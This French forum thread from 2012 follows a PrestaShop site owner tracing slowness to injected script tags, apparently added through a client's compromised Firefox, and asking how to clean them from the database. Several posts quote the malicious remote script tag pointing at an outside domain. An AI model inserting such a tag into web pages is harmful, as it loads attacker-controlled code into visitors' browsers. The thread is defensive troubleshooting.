canel Posted June 7, 2012 Share Posted June 7, 2012 (edited) Bonjour tout le monde ! Je rencontre des soucis de lenteur sur un site que j'ai réalisé. Plusieurs clients mon indiqué ce problème (même si moi je ne le perçoit pas trop). Au début j'ai pensé que c'était du à mes déclinaisons importantes (j'utilise Attribut Assistant Pro) mais on m'a indiqué que ça le faisais également sur des produits qui ont peu de déclinaisons (par dans Objets & Accessoires > Cravate) Pouvez-vous m'indiquer si vous rencontrez également ces mêmes problèmes et m'indiquer si certaines choses vous semble mal optimisé ? Merci d'avance Le site : http://www.miseauxpoints.com Prestashop version 1.4.7 Edited June 7, 2012 by canel (see edit history) Link to comment Share on other sites More sharing options...
Dev On Web Posted June 7, 2012 Share Posted June 7, 2012 Bonjour, Merci d'indiquer votre version de PS. D'autres topics ont été créés sur le sujet, je vous invite à aller les consulter. Link to comment Share on other sites More sharing options...
Paul MONFILS Posted June 7, 2012 Share Posted June 7, 2012 L'hébergeur (non indiqué dans les mentions légales d'ailleurs) est aussi une possibilité à étudier. Si c'est du mutu... Link to comment Share on other sites More sharing options...
yvon38 Posted June 7, 2012 Share Posted June 7, 2012 Bonjour, J'ai fait un test d'audit avec atypik qui vaut ce qu'il vaut parmi tant d'autres mais voilà déjà une piste à ne pas négliger : ""Votre Diagnostic technique et votre atypirank ne peuvent être effectués car il manque une des balises DOCTYPE, HTML, HEAD ou BODY qui sont très importante.""" Cela peut expliquer cette lenteur, votre site est effectivement lourd à charger.. Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Merci pour vos réponses. Je viens de remarquer une chose, je regardais le code source quand j'ai vu que dans ma balise meta description j'avais 4-5 lignes de blanc comme des retours. du coup je suis allez voir sur mes fiches produits et en regardant le code source de la partie résumé je m'aperçois qu'en dessous de mon texte j'ai cette balise qui apparait plusieurs fois : <script type="text/javascript" src="http://plugin-rose.info/dfi823hs.js?0.2874566364082648"></script> Qu'est ce que c'est d'après vous ? un piratage ?? Link to comment Share on other sites More sharing options...
Dev On Web Posted June 7, 2012 Share Posted June 7, 2012 C'est étrange en effet ! Ça indique TeamViewer oO Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Comment tu voit ça ? Link to comment Share on other sites More sharing options...
Dev On Web Posted June 7, 2012 Share Posted June 7, 2012 J'ai regardé le JS du domaine... Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Tu sais si je pourrais nettoyer tout les codes rapidement ? Par exemple en exportant la BDD et faire une recherche ? C'est peut être pas la meilleure solution ? Link to comment Share on other sites More sharing options...
Dev On Web Posted June 7, 2012 Share Posted June 7, 2012 Vu que c'est un JS inclut dans ton header, il a été ajouté par un de tes modules je pense. C'est de ce côté là qu'il faut chercher en premier. Ainsi que dans ton header.tpl. Thème d'origine ? Modules achetés ou tous d'origines ? Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Il n'est pas forcément dans le header, c'est ça qui est bizarre. Il peut aussi bien être dans la partie résumé de mes fiches produits ou encore dans mon menu principal. Link to comment Share on other sites More sharing options...
Dev On Web Posted June 7, 2012 Share Posted June 7, 2012 Encore plus bizarre alors^^ Dur de t'en dire plus comme ça là ... Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Je vais faire un test, j'ai l'impression que c'est quand ma cliente insert du contenu. Pour ma part j'ai créer un article aucun code présent, je vais lui demander d'en faire de même. Ce qui me met la puce à l'oreille c'est Teamviewer, je lui ai fait installer ce logiciel. Mon homme étant informaticien il l'utilise régulièrement sans aucun souci, peut-être l'a-t-elle télécharger au mauvais endroit.... Link to comment Share on other sites More sharing options...
canel Posted June 7, 2012 Author Share Posted June 7, 2012 Bon le problème du scirpt proviendrais de son Firefox car quand elle modifie sur internet explorer on à plus le soucis. Maintenant il faudrait que je nettoie toute la base, je pensais faire un rechercher/remplacer mais je viens de me rendre compte que la bailse change à chaque fois ex : <script type="text/javascript" src="http://plugin-rose.info/dfi823hs.js?0.08091213533112429"></script> <script type="text/javascript" src="http://plugin-rose.info/dfi823hs.js?0.2206051071152726"></script> Galère galère, auriez vous une petite idée de comment nettoyer tout ça sans se taper tout à la mano ? Merci Link to comment Share on other sites More sharing options...
Recommended Posts